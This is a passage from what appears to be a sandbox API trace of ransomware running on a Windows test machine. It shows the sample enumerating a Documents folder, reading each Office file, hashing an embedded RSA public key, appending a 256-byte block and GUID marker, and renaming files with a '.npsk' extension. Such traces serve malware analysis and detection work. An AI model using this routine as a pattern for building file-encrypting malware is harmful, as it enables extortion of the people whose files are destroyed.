KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0215.343] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1d70) returned 1 [0215.344] CryptCreateHash (in: hProv=0x7b1d70, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0215.344] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0215.344] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0215.344] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0215.344] GetLastError () returned 0x0 [0215.344] CryptDestroyHash (hHash=0x3277d68) returned 1 [0215.345] CryptReleaseContext (hProv=0x7b1d70, dwFlags=0x0) returned 1 [0215.345] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x7a79b8 | out: hHeap=0x750000) returned 1 [0215.345] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0215.345] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0215.345] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0215.345] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323db00 | out: hHeap=0x750000) returned 1 [0215.345] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8afa0 [0215.345] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x1f44, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0215.345] WriteFile (in: hFile=0x61c, lpBuffer=0x3217e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3217e98*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0215.346] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0215.346] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0215.346] CloseHandle (hObject=0x61c) returned 1 [0215.362] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\6leiTZ.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\6leitz.docx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\6leiTZ.docx.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\6leitz.docx.npsk")) returned 1 [0215.364] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb5bca510, ftCreationTime.dwHighDateTime=0x1d59291, ftLastAccessTime.dwLowDateTime=0x5166c920, ftLastAccessTime.dwHighDateTime=0x1d5e7c2, ftLastWriteTime.dwLowDateTime=0x5166c920, ftLastWriteTime.dwHighDateTime=0x1d5e7c2, nFileSizeHigh=0x0, nFileSizeLow=0x5537, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="a6fEh.xlsx", cAlternateFileName="A6FEH~1.XLS")) returned 1 [0215.365] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\a6fEh.xlsx") returned=".xlsx" [0215.365] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\a6fEh.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\a6feh.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0215.365] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=21815) returned 1 [0215.365] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0215.367] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x5511, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0215.367] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0215.369] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x5537, lpOverlapped=0x0) returned 1 [0215.370] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0215.370] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0215.370] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0215.370] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1d70) returned 1 [0215.371] CryptCreateHash (in: hProv=0x7b1d70, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0215.371] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0215.371] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0215.372] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0215.372] GetLastError () returned 0x0 [0215.372] CryptDestroyHash (hHash=0x3277d68) returned 1 [0215.372] CryptReleaseContext (hProv=0x7b1d70, dwFlags=0x0) returned 1 [0215.372] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0215.372] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0215.372] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0215.372] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8afa0 [0215.373] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x5537, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0215.373] WriteFile (in: hFile=0x61c, lpBuffer=0x3217e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3217e98*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0215.373] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0215.373] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0215.373] CloseHandle (hObject=0x61c) returned 1 [0215.387] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\a6fEh.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\a6feh.xlsx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\a6fEh.xlsx.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\a6feh.xlsx.npsk")) returned 1 [0215.396] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb209cd90, ftCreationTime.dwHighDateTime=0x1d560bd, ftLastAccessTime.dwLowDateTime=0xb4ee73b0, ftLastAccessTime.dwHighDateTime=0x1d5c596, ftLastWriteTime.dwLowDateTime=0xb4ee73b0, ftLastWriteTime.dwHighDateTime=0x1d5c596, nFileSizeHigh=0x0, nFileSizeLow=0x727c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Bhvkqti- a2heHB.pptx", cAlternateFileName="BHVKQT~1.PPT")) returned 1 [0215.396] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bhvkqti- a2heHB.pptx") returned=".pptx" [0215.396] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bhvkqti- a2heHB.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\bhvkqti- a2hehb.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0215.397] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=29308) returned 1 [0215.397] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0215.399] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x7256, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0215.399] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0215.401] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x727c, lpOverlapped=0x0) returned 1 [0215.418] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0215.418] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0215.419] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0215.419] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1d70) returned 1 [0215.420] CryptCreateHash (in: hProv=0x7b1d70, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0215.420] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0215.420] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0215.420] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0215.420] GetLastError () returned 0x0 [0215.420] CryptDestroyHash (hHash=0x3277d68) returned 1 [0215.420] CryptReleaseContext (hProv=0x7b1d70, dwFlags=0x0) returned 1 [0215.420] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0215.420] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0215.420] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0215.420] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8afa0 [0215.421] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x727c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0215.421] WriteFile (in: hFile=0x61c, lpBuffer=0x3217e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3217e98*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0215.421] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0215.421] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0215.422] CloseHandle (hObject=0x61c) returned 1 [0215.427] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bhvkqti- a2heHB.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\bhvkqti- a2hehb.pptx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bhvkqti- a2heHB.pptx.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\bhvkqti- a2hehb.pptx.npsk")) returned 1 [0215.429] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d207440, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0215.429] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\desktop.ini") returned=".ini" [0215.429] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf392c380, ftCreationTime.dwHighDateTime=0x1d56d0a, ftLastAccessTime.dwLowDateTime=0x24898410, ftLastAccessTime.dwHighDateTime=0x1d56e87, ftLastWriteTime.dwLowDateTime=0x24898410, ftLastWriteTime.dwHighDateTime=0x1d56e87, nFileSizeHigh=0x0, nFileSizeLow=0x15bee, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="e2QoKTBJ.pptx", cAlternateFileName="E2QOKT~1.PPT")) returned 1 [0215.429] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\e2QoKTBJ.pptx") returned=".pptx" [0215.429] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\e2QoKTBJ.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\e2qoktbj.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0215.430] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=89070) returned 1 [0215.430] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0215.432] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x15bc8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0215.432] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0215.434] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x15bee, lpOverlapped=0x0) returned 1 [0215.435] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0215.436] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0215.436] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0215.436] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1d70) returned 1 [0215.437] CryptCreateHash (in: hProv=0x7b1d70, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0215.437] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0215.437] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0215.437] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0215.437] GetLastError () returned 0x0 [0215.437] CryptDestroyHash (hHash=0x3277d68) returned 1 [0215.437] CryptReleaseContext (hProv=0x7b1d70, dwFlags=0x0) returned 1 [0215.438] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0215.438] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0215.438] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0215.438] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8afa0 [0215.440] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x15bee, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0215.440] WriteFile (in: hFile=0x61c, lpBuffer=0x3217e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3217e98*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0215.440] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0215.440] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0215.440] CloseHandle (hObject=0x61c) returned 1 [0215.456] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\e2QoKTBJ.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\e2qoktbj.pptx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\e2QoKTBJ.pptx.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\e2qoktbj.pptx.npsk")) returned 1 [0215.469] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f6a550, ftCreationTime.dwHighDateTime=0x1d5e62a, ftLastAccessTime.dwLowDateTime=0xcc080e10, ftLastAccessTime.dwHighDateTime=0x1d5e744, ftLastWriteTime.dwLowDateTime=0xcc080e10, ftLastWriteTime.dwHighDateTime=0x1d5e744, nFileSizeHigh=0x0, 